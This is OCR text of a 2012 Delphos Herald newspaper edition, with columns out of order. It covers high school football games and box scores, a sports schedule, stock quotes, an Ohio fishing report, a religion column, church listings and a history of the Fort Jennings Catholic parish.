hands. The Wildcats couldn’t take advantage and Waynesfield took over at its 21 with 1:33 on the clock. With Miller hitting 3-of-7 passes for 50 yards and also running for 21 (13 rushes, 68 yards), they drove the field in 11 plays. At the Delphos 2, Hennon busted off left guard with 2.2 ticks showing. Metsa’s kick made it 14-13 at the half. “I thought our first two series, we were pretty solid offensively. We then got a little lax,” Lindeman added. “What was good was how we came back out the second half and did well in all there phases: forcing turnovers and even getting a special teams score.” Jefferson hosts Paulding 7:30 p.m. Friday to commence NWC action. Waynesfield is at Fort Recovery.
Tom Morris photo
Jefferson junior Zavier Buzard would not be denied on this scoring run Friday night, a 14-yarder where he bulled past Waynesfield-Goshen’s Jacob Risner and another defender on his way to the end zone. The score was part of a 25-point second half and a 38-17 victory.
ping it, he tore off for the wall on the right side, found the seam, made one cut inside at midfield and was gone for an 80-yard return score. Junior Austin Jettinghoff’s extra point was wide for a 25-14 spread at 5:41 of the third. The Tigers needed to respond to stay within striking distance and they did. After Lake Turner returned the kickoff 16 yards to the 36, they went on a 10-play sojourn that reached the Delphos 19. From there, exchange student Roope Metsa was good on a 36-yard field goal try to reduce the deficit to 25-17 with 2:03 showing in the third. The Red and White answered after junior Tyler Mox returned the kickoff 18 yards to the 38. They needed nine plays to do so, all but one a run — a 13-yard pass from Jettinghoff (5-of-8 passing, 129 yards) to classmate Ross Thompson (2 grabs, 56 yards). At the Tiger 14, junior tailback Zavier Buzard (18 totes, 143 yards) took a sweep to the right side and bulled his way to the pylon for the six. Jettinghoff’s point-after was wide for a 31-17 edge with 9:58 left. The next host possession ended as Miller was picked off by freshman Dalton Hicks at the Delphos 49. It took five plays — including a 45-yard aerial from Jettinghoff to Kortokrax — to add the final tally. At the WG 1, Wessell bulled straight up the middle with 6:58 left. Jettinghoff was good on the kick for the final 21-point margin. After the Wildcats held on the opening possession, they rode the offensive line of Geoff Ketcham, Evan Stant, Colin McConnahea, Isaac Illig and Kimmett on a 7-play, 91-yard drive — all on the ground. Buzard ran five times for 82 yards, including the 55-yard scoring run. He started off left tackle, escaped pressure behind the line and popped outside, finding open spaces along the sideline. He outran the defenders to the pylon. Jettinghoff’s conversion made it 7-0 at 7:03 of the first. The Tigers — out of the Wing-T — replied with a 14-play, 69-yarder, all on the ground. At the Jefferson 1, Gabe Hennon (25 carries, 87 yards) powered in off right guard for the tally with 18:9 ticks showing in the period. Metsa tied it at 7-7. An offensive pass interference on the Wildcats’ drive stymied that sequence and they punted, as did WG on its series. Jefferson used a quick 4-play, 56-yard series on its drive to retake the lead, including a 43-yard pass from Jettinghoff to Thompson. At the Tiger 3, Wessell went inside right guard, took one step to the right and found the end zone. However, the PAT was wide for a 13-7 lead with 6:28 showing in the half. The hosts reached Jefferson space but another tipped pass by Kortokrax ended up in Thompson’s
JEFFERSON 38, WAYNESFIELDGOSHEN 17 Jefferson 7 6 12 13 - 38 0 - 17 W-Goshen 7 7 3 FIRST QUARTER DJ — Zavier Buzard 55 run (Austin Jettinghoff kick), 7:03 WG — Gabe Hennon 1 run (Roope Metsa kick), :18.9 SECOND QUARTER DJ — Quentin Wessell 3 run (kick failed), 8:28 WG — Hennon 2 run (Metsa kick), :02.2 THIRD QUARTER DJ — Wessell 15 run (run failed), 8:02 DJ — Drew Kortokrax 80 punt return (kick failed), 5:41 WG — Metsa 36 field goal, 2:03 FOURTH QUARTER DJ — Buzard 14 run (kick failed), 9:58 DJ — Wessell 1 run (Jettinghoff kick), 6:58 TEAM STATS Waynesfield Jefferson First Downs 17 12 Total Yards 283 360 Rushes-Yards 51-205 33-231 Passing Yards 78 129 Comps.-Atts. 7-18 5-8 Intercepted by 0 3 Fumbles-Lost 1-1 2-1 Penalties-Yards 4-20 6-55 Punts-Aver. 3-40 4-40.3 INDIVIDUAL WAYNESFIELD-GOSHEN RUSHING: Gabe Hennon 25-87, Garrett Miller 13-68, Gabe Wilcox 9-37, James Elliott 4-13. PASSING: Miller 7-18-78-3-0. RECEIVING: Eli O’Leary 3-20, Lake Turnerf 2-27, Jerod Hennon 2-22. JEFFERSON RUSHING: Zavier Buzard 18-143, Quentin Wessell 13-84, Austin Jettinghoff 2-4, Team 1-(-)3. PASSING: Jettinghoff 5-8-129-00. RECEIVING: Ross Thompson 2-56, Drew Kortokrax 1-45, Tyler Mox 1-14, Buzard 1-4.
THURSDAY Boys Soccer Kalida at Fort Jennings (PCL; V first), 5 p.m. Spencerville at Lincolnview, 5 p.m. Wapakoneta at Elida (WBL), 7 p.m. Girls Soccer Allen East at St. John’s, 5 p.m. Shawnee at Van Wert (WBL), 5 p.m. Boys Golf Spencerville at Bluffton at Columbus Grove (NWC), 4 p.m. Crestview, LCC and Allen East at Lincolnview (NWC), 4 p.m. Fort Recovery at St. John’s (MAC), 4:30 p.m. Elida at Van Wert (WBL), 4:30 p.m. Girls Golf Lincolnview and Indian Lake at St. Henry (Elks), 4 p.m. Volleyball St. John’s at Coldwater (MAC), 5:30 p.m. Ottoville at Kalida (PCL), 6 p.m. Spencerville at Wayne Trace, 6 p.m. Elida at Wapakoneta (WBL), 6 p.m. Van Wert at Shawnee (WBL), 6 p.m. Girls Tennis Van Wert at Elida (WBL), 4:30 p.m. FRIDAY Football Paulding at Jefferson (NWC), 7:30 p.m. Ada at Spencerville (NWC), 7:30 p.m. Wapakoneta at Elida (WBL), 7:30 p.m. Allen East at Columbus Grove (NWC), 7:30 p.m. Shawnee at Van Wert (WBL), 7:30 p.m. Crestview at Lima Central Catholic (NWC), 7:30 p.m. Boys Soccer Lincolnview at Ottoville, 5 p.m. Girls Soccer Ottoville at Lincolnview, 4:30 p.m. SATURDAY Football Port Clinton at St. John’s, 1 p.m. Boys Soccer Fort Jennings at Archbold (JV first), 5 p.m. Kalida at Celina, 7 p.m. Girls Soccer Lima Senior at St. John’s (V only), 10 a.m. Wauseon at Kalida, 1 p.m. Volleyball Spencerville at St. Marys Invitational, 10 a.m. Columbus Grove at Arlington, 10 a.m. Stryker and Archbold at Crestview, 10 a.m. Kenton at St. John’s, 11 a.m. Co-ed Cross Country Ottoville, Lincolnview, Spencerville, Kalida and Crestview at Columbus Grove Invitational, 9 a.m. Van Wert at Greenville, 9 a.m. St. John’s and Elida at Wapakoneta Night Meet, 7 p.m.
Bulldogs rout rival Rockets in grid opener By Dave Boninsegna The Delphos Herald COLUMBUS GROVE — It was deja vu all over again for the Columbus Grove Bulldogs as they began the 2012 football season the same way as the previous three — with a win over their State Route 12 rival PandoraGilboa Rockets Friday night at Clymer Stadium. The Rockets scored on the first possession of the game but Grove rattled off 40 unanswered points en route to a 40-6 victory. Collin Grothaus ran for a touchdown and threw for two more, adding 14 carries for 193 yards, Joey Warnecke ran the ball just three times but two of those found the end zone. Dakota Vogt had a 51-yard touchdown run, while David
Quotes of local interest supplied by EDWARD JONES INVESTMENTS Close of business August 24, 2012 Description Last Price
13.157.97 3,069.79 1,411.13 365.08 64.42 46.44 42.19 53.49 42.80 45.56 29.83 16.61 16.51 9.49 66.09 21.18 11.88 58.14 56.96 33.33 6.55 67.60 37.17 52.50 27.73 88.92 30.56 73.06 67.02 1.23 4.89 42.09 33.03 9.02 43.17 72.11
STOCKS
Bogart and Riley Brubaker both caught Grothaus passes for touchdowns. The Rockets used six plays on their first drive of the game in finding the end zone; Seth Schmenk took the ball 46 yards to paydirt, although the extra point was missed, making it a 6-0 contest. However, that lead would not last long; the hosts would answer back on their first touch of the ball as Schmenk’s counterpart, Grothaus, took the Bulldogs third play from scrimmage 67 yards to the end zone. After a completed 2-point conversion, the home team lead 8-6. It appeared the Rockets would be on the move again; P-G was on a 10-play drive when it stalled out and turned the ball over on downs. Grove went 75 yards in six plays, culminating with a 51-yard TD run by Vogt; after
FRIDAY ROUNDUP
Change
+100.51 +16.39 +9.05 +1.82 -0.26 +0.67 -0.06 +0.35 +0.20 +0.21 +0.25 +0.14 +0.03 +0.04 +0.48 -0.16 +0.02 +0.92 +0.41 +0.16 +0.02 +0.47 -0.06 +1.05 +0.37 +0.67 +0.31 +0.40 +0.34 +0.02 +0.11 +0.29 +0.27 0 +0.92 +0.55
Scoring by Quarters: Pandora-Gilboa 6 0 0 0 - 6 Columbus Grove 22 6 0 12- 40 Scoring 1st Quarter PG- Schmenk 46 run (kick failed) CG- Grothaus 67 run (2-point conversion good)
a missed 2-point attempt, the home team led 14-6 with just under three minutes to go in the first stanza. Grothaus didn’t make many mistakes on the night but on the Bulldogs’ next possession, he gave up an interception as the Rockets picked off a pass at the Columbus Grove 26-yard line. However, the ’Dogs’ defense was relentless and returned the favor when Hunter Giesige picked off a Schmenk pass to give the ball back to the hosts. This set up another long drive and another big play; Grothaus got loose again, this time for 50 more yards, setting up a 35-yard touchdown pass to Bogart, making it a 22-6 game. Both teams were held scoreless in the third but the home team got another big play in the fourth when Brubaker got open for a 40-yard strike to bring the score to 34-6. The Bulldogs scored the final points of the contest on yet another big play. Warnecke found the end zone for the second time, this one from 22 yards out, giving him his second score of the contest. Grove rushed for nearly 320 yards in the game, while Grothaus was 5-of-7 passing for 108 yards. The Rockets ran for 123 yards with 38 yards in the air. But the real differential was in the penalty yards. The first game of the season normally brings about a lot of adjustments but the Rockets were penalized five times for false starts and 10 times in the game for nearly 100 yards. Grove was flagged eight times for 45 yards. Grove hosts Allen East at 7:30 p.m. Friday.
CG- Vogt 51 run (2-point conversion failed) CG- Bogart 35 pass from Grothaus (2-point conversion good) 2nd Quarter CG- Warnecke 11 run (2-point conversion failed) 3rd Quarter No scoring 4th Quarter CG- Brubaker 40 pass from Grothaus (2-point conversion failed) CG- Warnecke 22 run (2-point conversion failed) ----
Score by Quarter Perry 0 0 0 7-7 Spencerville 21 14 22 6 - 63 Scoring: First SV - John Smith 49 run (kick failed) SV - Smith 39 run (Jacob Lowry kick) SV - Hunter Patton 94 interception return (Derek Goecke Pass to Dominick Corso) Second SV - Colton Miller 1 run (Lowry kick) SV - Anthony Schuh 19 run (Lowry kick) Third SV - Smith 10 run (Lowry kick) SV - Schuh 33 run (Lowry kick) SV - Dusty Settlemire pass from Mason Nourse (Nourse to Logan Vandemark) Fourth SV - Vandemark 1 run (run failed) P - Caiden Dicke 8 run (Andrew Gipson kick) Stats: Perry Spencerville First Downs 5 19 Total Yards 72 557 Rushing Yards 72 534 Passing Yardage 0 23 Comp./Atts./Ints. 0-7-3 2-2-0 Fumbles/Lost 4-1 1-0 Punts/Aver. 5/36.4 0/0 Penalties/Yards 3-25 5-50 Spencerville Rushing John Smith - 17 rushes, 238 yds., 3 TDs Anthony Schuh - 10 rushes, 95 yds., 2 TDs Colton Miller - 11 rushes, 95 yds., 1 TD
Bearcats destroy Commodores SPENCERVILLE — The Spencerville football team dominated on both sides of the ball Friday night at Moeller Stadium, compiling 557 yards of offense and holding the Commodores to a mere 72 yards, securing a 63-7 rout. All but 23 yards was on the ground for the Bearcats, who host Ada Friday.
OHIO DEPARTMENT OF NATURAL RESOURCES Division of Wildlife Weekly Fish Ohio Fishing Report CENTRAL OHIO Alum Creek Lake (Delaware County) - Smallmouth bass are active in this 3,192-acre lake north of Columbus; use crankbaits and jigs to fish the drop-offs of points in the lower basin. Saugeye can be caught in the same areas; try trolling worm harnesses in front of the beach at dawn and dusk. Crappies are being found around woody vegetation in 10-15 feet of water; use jigs or minnows. Muskies can provide good action this time of year; troll crankbaits along main lake points, the dam and causeways. Kokosing Reservoir (Knox County) - This 149-acre reservoir provides good largemouth bass and crappie fishing. Fishing the island and along the face of the dam for largemouths can be productive; try crankbaits and spinner baits. Crappies can be found along woody shoreline cover and in the old creek channel. As water temperatures decrease, these will move into shallower water to feed; minnows and jigs are the best baits. Channel catfish can be caught from shore on worms, shrimp and chicken livers. This lake has a 10-HP limit. NORTHWEST OHIO Maumee River (Lucas/Wood counties) - Anglers looking for some smallmouth action should check around Grange Island near the Route 64 bridge in Waterville. Anglers have been wading and casting pink and chartreuse twister tails; good numbers of fish in the 8to 15-inch range have been caught, as well as a few larger ones, especially the 4- to 5-foot deep holes around the island. Anglers can access the river from Memorial Park in Waterville. This is part of the Lake Erie fishing district, so a bag limit of 5 and a minimum size of 14 inches apply. Nettle Lake (Williams County) - This 103-acre natural glacial lake is located on CR 4.75, off of SR 49. Largemouth bass should be biting; mornings are usually the best but don’t overlook the evening bite. Focus efforts along the edges; try top-water lures and crème worms. Large crappies can usually be found near the lily pads in the northwest corner. There is a boat ramp off of CR 4.75 at the southwest corner. There are no horsepower restrictions; however, there is a No-Wake Rule (power boaters must operate at idle speed) between the hours of 6 p.m. and 10 a.m. From 10 a.m. until 6 p.m., there are no speed restrictions for power boaters. Findlay Reservoir #2 (Hancock County) - This 629-acre site with
4.2 miles of shoreline is located southwest of Findlay on Twp. Road 207, with a full boat ramp at the southern shore. Anglers should still be able to hook into some walleye in the evenings near the shoreline. Yellow perch and white bass should also be biting; white bass can be found feeding near the surface in schools throughout. During summer and fall, yellow perch can be caught around structure; the best baits include minnows and larval baits fished near the bottom. There is a 9.9-HP limit. NORTHEAST OHIO Mogadore Reservoir (Portage County) - This scenic reservoir continues to produce excellent catches of largemouths; casting white weedless rubber frogs into weedy bays and retrieving them over pockets of open water consistently produces explosive strikes. Weedless soft plastic worms in dark colors and brightly-colored deepdiving crankbaits have also been effective. The site is owned/operated by the City of Akron; thanks to the city, sportsmen/women can enjoy its wildlife-related resources. Fishing from shore is somewhat limited but the entire reservoir is available for boat fishing (electric motors only). SOUTHWEST OHIO Grand Lake St. Marys (Auglaize/ Mercer counties) - Channel catfish are popular at Ohio’s largest inland lake; try fishing on the bottom with nightcrawlers, chicken livers, shrimp or cut baits, particularly the Windy Point fishing pier and the stone piers along the east bank. Increase your chances of catching a large flathead catfish by using large chub minnows or live sunfish. LAKE ERIE Daily Bag Limit Per Angler Regulations to Remember: Walleye (on Ohio waters of Lake Erie) - 6 fish (minimum size, 15 inches); Yellow perch (on all Ohio waters of Lake Erie) - 30 fish; Trout/salmon - 5 through Friday (minimum size, 12”); Black bass (largemouth and smallmouth) - 5 (minimum size, 14”). Western Basin: Walleye fishing has been fair, especially N of “B” and “C” cans of the Camp Perry firing range and W of Rattlesnake Island. Trollers have been using worm harnesses with inline weights or divers and also divers with spoons. ... Yellow perch fishing has been good, particularly near buoy 13 of the Toledo shipping channel, the turnaround buoy of the Toledo shipping channel, the Toledo water intake, around “A” and “B” cans of the Camp Perry firing range, W of Rattlesnake Island and between Lakeside and Kelleys Island; perch-spreaders with shiners fished near the bottom produce the most fish. Department insiders that no one was held accountable. Coptic Christians and other religious recent release of the 2011 International Religious Freedom Report. “Egyptians are building a brand new democracy,” said Clinton, describing her recent visit there. “As I told the Christians with whom I met, the United States does not take the side of one political party over another. What we do is stand firmly on the side of principles. Yes, we do support democracy
Clinton defends religious liberty - abroad
TERRY MATTINGLY
Saturday, August 25, 2012
The Herald – 7
On Religion
-- real democracy, where every citizen has the right to live, work and worship how they choose. ... “We are prepared to work with the leaders that the Egyptian people choose. But our engagement with those leaders will be based on their commitment to universal human rights and universal democratic principles.” The “sobering” reality, she stressed, is that religious freedom is “sliding backwards” worldwide, with more than a billion people living under regimes that deny them freedom of speech, association and liberty on matters, director of Georgetown University’s Project on Religious Freedom. He served as the first director of the State Department office on international religious freedom. The problem is that America’s ambassador at large for international religious freedom has “little authority, few resources and a bureaucracy that is -- notwithstanding the secretary’s fine words -- largely indifferent” to the global state of religious freedom, noted Farr, in remarks posted at National Review Online. “It doesn’t take a rocket scientist to realize that this issue is not a priority for this administration, except perhaps for the speechwriters (who are doing an outstanding job).” In her speech, Clinton did address a few hot topics that have previously been out of bounds, such as blasphemy laws. It’s time for Americans to realize, she said, that matters of faith and conscience are often life-and-death concerns -- literally. “Certain religions are banned completely, and a believer can be sentenced to death,” she said. .” When Americans defend religious freedom they are not simply defending values found in this land’s laws and creeds. They are also defending a key central tenet of the Universal Declaration of Human Rights. Thus, Clinton quoted impossible to read those words, she said, without realizing that “religious freedom is not just about religion.” It’s about unbelievers, heretics, apostates and converts being able to live, think and gather in safety without the “state looking over their shoulder.” Without freedom of conscience, said Clinton, democracy is not safe. “You can’t debate someone who believes that anyone incorrect views.”
Sunday-9:00 a.m. Worship Service Monday: 5:00 p.m. Hall in use Wednesday - 7:00 p.m. Worship Service Saturday - 8:00 a.m. Prayer Breakfast; 3:30 p.m. Wedding Sunday - 9:00 a.m. Worship Service; 9:15 a.m. Seekers Sunday School class meets in parlor; 10:30 a.m. Worship Service; 11:30 a.m. Radio Worship on WDOH; 1:003:00 p.m. Sr. High Kick-off @ Mike & Beckey Binkley; 5:30 p.m. Food for Concert in the Park served by Trinity’s Missiona Committee; 6:00 p.m. Concert in the Park “Dan Heath with the Paradise Band” Mon.: 7:00 p.m.: Trustees; 7:30 p.m. Admistrative Council;..
BREAKTHROUGH 101 N. Adams St., Middle Point Pastor Scott & Karen Fleming Sunday – Church Service - 10 a.m, 6 p.m. Wednesday - 7:00 p.m.
V
112 E. Third St.
Lucy Pohlman 419-339-9196 Schmit, Massa, Lloyd 419-692-0951 Rhoades Ins. 419-238-2341. an Ert ounty until 11:30 a.m. - Wednesday Line - (419) 238-4427 or (419) Sunday- 8:45 a.m. Friends and 232-4379. Family; 9:00 a.m. Sunday School Emergency - (419) 993-5855 LIVE; 10:00 a.m.
Stop in & See Us After Church For
Sunday Rolls!
W
C
662 Elida Ave., Delphos 419-692-0007 Open 5 a.m.-9 p.m.
419-692-3413
SALEM UNITED utnam ounty School; 9:30 a.m. - Worship; 10:45 a.m. - 11:00 Church Service; 6:00 p.m. Sunday school; 6:30 p.m. - Capital Evening Service Funds Committee. Wednesday - 7:00 p.m. Evening Monday - 6 p.m. Senior Choir. Service IMMACULATE CONCEPTION Pastor: Rev. Ron Prewitt CATHOLIC CHURCH Sunday - 9:15 a.m. Morning worOttoville ship with Pulpit Supply. Rev. John Stites Mass schedule: Saturday - 4 KINGSLEY UNITED METHODIST p.m.; Sunday - 10:30 a.m. 15482 Mendon Rd., Van Wert Phone: 419-965-2771 ST. BARBARA CHURCH Pastor Chuck Glover 160 Main St., Cloverdale 45827 Sunday School - 9:30 a.m.; 419-488-2391 Worship - 10:25 a.m. Fr. John Stites
p
C
10098 Lincoln Hwy. Van Wert, OH
419-238-9567
Alexander & Bebout Inc.
Boarding Kennel and Grooming
The Animal House
Foster Parents Needed!
Phone 419-302-2982 animalhousekennels.com 20287 Jennings Delphos Rd. Delphos, Ohio 45833. CORNERSTONE BAPTIST CHURCH 2701 Dutch Hollow Rd. Elida Phone: 339-3339 Rev. Frank Hartman Sunday - 10 a.m. Sunday School (all ages); 11 a.m. Morning Service;
419.238.1695 or
GOOD FOOD COOL TREATS
• Burgers • Fries • Shakes • Ice Cream
The Main Street
107 E. Main Street • Van Wert, OH 419-238-2722
Ice Cream Parlor
8– The Herald
Saturday, August 25, 2012
Fort Jennings churches
(Continued from page 4)
received from Schoolmaster Boehmer, Herzog’s landlord in Fort Jennings. Boehmer warned of trouble brewing in Fort Jennings because of Rev. Herzog’s zealous teachings with imprudence. Records showed that Herzog paid personal property taxes in 1847 and 1848. These taxes were paid only by residents in the township. Rev. Herzog left Fort Jennings, returning to Minster, where he died in 1853. In August of 1848, Father Boehne was appointed the new resident pastor of Fort Jennings. This meant a Catholic parish was established at that time. With Father Boehne’s pastorate the records of the parish began. The first baptism recorded was that of Pauline Alvina, daughter of Louis and Catherine (nee Bolker) de Lucenay baptized 20 October 1848. The next entry was twins, Wilhelm and Catherine, son and daughter of Ferd and Agnes Lehmkuhl, baptized 25 October 1848. The only other baptism that year was Anna Elizabeth Helmkamp, daughter of William and Anna. The Bishop had encouraged the building of a new church. This was accomplished in 1852, under the guidance of Father Bohne. It was built on Water Street on lots donated by Boehmer. The 40 X 60 brick structure had a wooden steeple. The altar, pulpit and pews were of native black walnut. It had a small choir loft and the edifice was heated with a wood burning furnace. Entries of the first deaths were evidently made in the year of the cholera plague, 1855. These included: Schulte, kind, Aug 16; Henrick Brinkman, frau, Aug 19; L. de Lucenay, Aug 29; H. Broecker, frau, Aug 26; G. Stratman, Aug 29; F. Schimmoller, Sept 6; Lursman, kind, Sept 8; Frederick Kramer, Sept 17; L. Kramer, Sept 21; Casper Lehmkuhl, frau, Oct 8; Stratman, kind, Oct 12 and Franz Werries, Dec 14. Burials were made the same day as the death. Added to the cause of death were typhus, magenfieber and fleckenfieber. In the two years, 1855 and 1856, there were 62 deaths in the parish, 28 of which were those of children.The peak of the plague was over when the little parish suffered another loss. Father Bohne, who had suffered from epilepsy, was taken ill in June of 1860 and died in September. He was buried in the new graveyard down along the river, rather than in the old one in the same black with the church. After Father Bohne’s death the parish was attended to by Rev. Francis Westerholt of Delphos St. John’s. He served until 1861, when Father Goebbels was named the second resident pastor from 1861 to 1864. Then Ottoville became a mission of Fort Jennings. Father Bohne had lived in homes of parishioners. However Father Goebbels had a two story frame rectory built on Water Street. Soon turmoil rocked the nation. The Civil War began and several sons of the parish were called to service. There is no complete list of these men but the Blue Book lists the following Civil War Veterans as being buried in the St. Joseph’s Cemetery: Fredrich Baumann, Amos Boehmer, Henry Bode, Mathias Boberg, Ferdinand Eggemann, Theodore Hageman, Bernard Lehmkule, Joseph Menke, Frederich Schuerman, Henry Schuerman and John Wiechart. Sigmund Rekart and John Discher, Jr. also served. The first marriage records of the parish date from Father Goebbel’s time. On 11 February 1863, he officiated at the marriage of Anton von Lehmden and Catherine Ostendorf. On 4 November 1863, Ignatius Neidert and Catherine Reckfelder were joined in marriage. The first record of a First Communion class was made by Father Goebbels. In this March, 1862 Class of 16 were: Wilhelm Boehmer, Ludwig Calvelage, Mathias Shluter, Bernard Bohn, Maria Elizabeth Focker, Elizabeth Catherine Odenwaller, Anna Marie Recker, Mary Catherine VonDerEmbse, Julia Rekart, Lucia Schlober, Maria Agnes Wischenbrink, Catherine Hellman, Maria Wink and Maria Elizabeth Gerker. When Father Goebbels was reassigned, the Rev. H. E. Hammers became the pastor. He remained for less that a year in 1866. Then the parish became a mission of Ottoville again, where Rev. Anthony Abels was pastor. In 1866 the Rev. Christian Viere was sent as the new pastor of Fort Jennings. He remained as pastor for two years. Ten years after Father Viere left Fort Jennings, Bishop Gilmore removed him from his pastorate at Defiance St. John’s. Viere left the ministry, became a doctor of medicine and returned to FortJennings to practice. Residents elected him mayor of the village and justice of the peace of Jennings Township. Viere was reconciled with the Catholic Church before his death on 21 January 1893. He was buried as a priest in St. Joseph’s Cemetery. Following Father Viere’s reassignment, the parish again became a mission of Ottoville. The Rev. Michael Mueller met the spiritual needs of the parish for 2 years until a new pastor; the Rev. Leonz Zumbuhl arrived in July of 1870. During several months of 1872, while still assigned to FortJennings, Rev. Zumbuhl taught at St. Mary’s Seminary in Cleveland. During that time Rev. Mueller again came to FortJennings from Ottoville. St. Joseph’s remained a mission of Ottoville for 2 years until Rev. Charles Barbier arrived. The new pastor had been a French artillery officer. He owned a large library on the subject of fireworks. Each year he arranged for a colorful fireworks display on the church grounds on the Fourth of July. Father Barbier made the fireworks. Father Barbier died on 23 August 1876, and was buried in the parish cemetery. Father Barbier instructed that the chemicals he possessed for making fireworks should be thrown into the river when he died. He was afraid that they might become dangerous weapons in the hands of inexperienced handlers. A few months after the death of Father Barbier, the Rev. John Michenfelder was appointed to the parish. He and the Ottoville pastor also cared for the new Kalida Mission which was founded in 1877. The main altar of the church was replaced during Father Michenfelder’s pastorate and the parish bought an organ. Father Michenfelder remained three years before being transferred. His successor, the Rev. George Peter, also moved on after only three years. Father Jacob Heidecker arrived in FortJennings in July of 1881. He soon convinced parishioners of the need for a new church. Work began soon after Frederick Heitz, of Delphos, was hired as the general contractor. A procession of parishioners hauled stone by horse and wagon from the Rimer quarry. Bricks were made from a clay deposit along the Auglaize River. Bricks were burned in the spot under the supervision of William Guthrie, who received 5.00 a day. The cornerstone was laid 27 May 1883. Soon another slender Gothic spire stood out as a landmark in Putnam County. The church was 132 X 55 feet and erected at a cost of 21,000.00. The dedication took place 4 May 1884 but a torrential rain dampened the planned procession. One of the most unique architectural features of this edifice were the flying buttresses which graced each corner of the steeple and gave it added support. The furnishings of the church were ash and the gift of Matthias Hellmann, who had willed an 80 acre farm to the parish. Sale of the farm raised 4500.00 which was used to purchase the pews, altar, pulpit and Communion rail. The ornate workmanship of the Main Altar and the 2 side altars was considered to be among the most beautiful in Northwestern Ohio. The old church was converted into classrooms to supplement the corner school building. Father Heidegger left Fort Jennings in 1888 for the Dakotas, where he later died. He was replaced by Swissborn Father Charles Braschler, whose pastorate lasted one year. He was a linguist and musician. He could play a number of musical instruments in addition to the organ. Under his leadership an addition to the cemetery was laid out and a large crucifix was erected in the graveyard. A year before the turn of the century Rev. Matthias Arnoldi was appointed to succeed Father Braschler. A new brick pastoral residence was built at the cost of 7000.00 during Father Arnoldi’s pastorate. In 1904 lightning damaged the old church building which was being used as a school. A new school was built by the parish on Lot 6 and dedicated in August of 1909. The Toledo Diocese was formed in 1911. This was the third diocese of which Fort Jennings was a part of since its formation 63 years earlier. First it was Cincinnati, then Cleveland. Father Arnoldi was given credit for bringing the Sisters of St. Francis, Tiffin to For Jennings but such was not the case. They arrived during that time but not with his blessings. He did nothing to promote their comfort. An entry in the minute book in the Tiffin archives of the Sisters, dated September 1913, reads: “Sisters Anastasia, Mercedes and Vincent are sent to St. Joseph’s School, FortJennings, Ohio. Mrs. Leo Wildenhaus taught the upper grades. The Rev. Mathias Arnoldi, Pastor, did not wish sisters, so he made little preparations for their coming…. The Sisters lived in the school for sometime, but the first night they slept in the Miehls’ home, because the mattresses provided for them were “so dirty.” Parishioners came to their aid with food and living necessities. The bishop visited the parish. Soon after the Rev. John Christ was appointed to replace Father Arnoldi. Rev. Christ arrived in 1914. He was also an accomplished musician and an avid gardener. He displayed the best blue gladiolas at the Chicago World’s Fair. The next pastor was the Rev. Philip Schritz, who arrived in 1916. During his pastorate the C K of O held a picnic on the church grounds to buy a stained glass window for the Sanctuary. In 1916 the parish had 162 families (including 8 mixed marriages) and a congregation of 700 members. Then in 1917 the USA declared war on Germany. Special church services were held, including a novena, to implore the aid of the Immaculate Mother of Peace. Electric lights were installed in church in time for this special service. In 1917 the Sisters of St. Francis also moved into their new brick convent. A special service was included during the Forty Hours Devotion in August of 1918. The community prayed for the safe return of the 47 men of the parish, who were serving in the military. Three months later the armistice was signed. Four young men died during the war. They were Jacob Yenner, William Hellman, Elmer Kalt and Grover Calvelage. Receptions were given at the Memorial Hall for returning soldiers. The Spanish influenza epidemic struck the community during the winter of 1918, infecting more than 100 people in a few days. A “mission” was held in the Parish in 1919. Many folks the confessional. In 1924 Father Schritz visited all parishioners and took up a subscription for a new furnace in the school and a driveway in the cemetery. School attendance was averaging 160 students at this time. It was noticed in about 1928 that one young man and one young woman from the community were attending college. Rev. George J. May arrived in 1929 to take over the realm as pastor. He found the school building to be too small so 2 rooms were added, making 8 classrooms, with 9 teaching sisters. This was the year when B. A. Miehls bought a new organ in Lima and donated it to the parish. Mrs. B. A. Miehls had been the organist for almost 35 years. In those days the people were told which parish church to belong, too. A controversy arose over the boundaries between Cloverdale, Ottoville and Fort Jennings. A representative from the diocese ruled that everything from the Muntana Road north was Cloverdale territory. The favorite pastor of all time, Father John H. Miller, arrived in Fort Jennings in the fall of 1937. He would serve the parish for the next 30 years. He was a very saintly man, who loved to fish and got along well with the Lutherans. His housekeeper was Theresa Long, who also did the gardening. Father Miller often took Theresa and the Sisters of St. Francis along on fishing trips to the Auglaize River. Theresa was often seen picking up fish worms while gardening and putting them into her apron pocket. Then came “Pearl Harbor” on 7 December 1941, a day which would live in infamy. Many young men were called to the service of their country. Five from the parish did not return. They were Hubert Berelsman, Raymond Brockman, Elmer Broecker, Francis Hageman and William Lauf. The service flag in the church was filled with 103 stars. The parish celebrated the centennial in 1949, although it should have been one year earlier. The church was frescoed, a new rubber tile floor was laid
First brick Catholic church in Fort Jennings.
buildings because it was supported as a public school. Father Stein arrived in time to be involved in the building of the new elementary school with its 14 classrooms and a multi purpose room. It also had a kitchen and cafeteria. Father Stein was transferred in 1962, being replaced by Rev. John Hanacsek, a native of Czechoslovakia, who was ordained in Austria. On 25 March 1966 Father Hanacsek celebrated the first Mass in Fort Jennings, in which the priest faced the people. Father Hanacsek helped many parishioners get tickets for the Papal Mass in New York City in 1965. Pope Paul VI was elected in 1963. Father Miller celebrated his Golden Jubilee on 21 November 1964 at the age of 80. Two years later the new Sister’s Convent was build, facing First Street. Menke Bros. received the contract for 65,000.00 The Father Miller era ended in 1967, with his death on April 14th. He was buried in Toledo. He had served God and the community well. Father Hanacsek continued his duties until the new Pastor, Father Stein returned to Fort Jennings in June. He served as pastor for one year. Father Hanacsek later served as pastor of New Bavaria and North Creek. The Rev. Herman J. Fortman came to the parish as pastor in 1968. He was a native of Kalida. One of his first projects was installing a replica of Michelangelo’s Pieta at the entrance of the cemetery. In 1969 Menke Bros. were given the contract for a new rectory with building and furnishings costing 135,000. Father Fortman was often seen on the riding mower in the cemetery. Monsignor J. Fridolin Frommertz, retired the same year Father Fortman came to FortJennings. Father Fortman invited the Monsignor to live with him and help with the parish. Father Frommhertz assisted until his death in 1973. From his arrival until 1971, Father Fortman taught the high school religion classes once a week, during a common free period. In 1971 the parish began Thursday evening CCD classes for high school students. Lay persons helped with the teaching. The second Vatican Ecumenical Council of the Catholic Church was held from 1962 – 1965. The bishops attempted to come up with a plan for the church to survive in the modern world. Many of the profound changes were good but some sere not so good. New altars were installed for the priest to face the congregation during Mass. Mass was celebrated in English instead of the traditional Latin. Saturday evening Masses were introduced to answer the Sunday Mass requirements. Parish councils were elected to act as advisors to the pastor and parishioners were asked to become more active in the church which included being lectors and cantors. Carl Wieging became the first lector in the parish. Lay persons were now permitted to distribute Holy Communion as both bread and wine. Catholics could receive the Eucharist in the hand. All of these changes were accepted 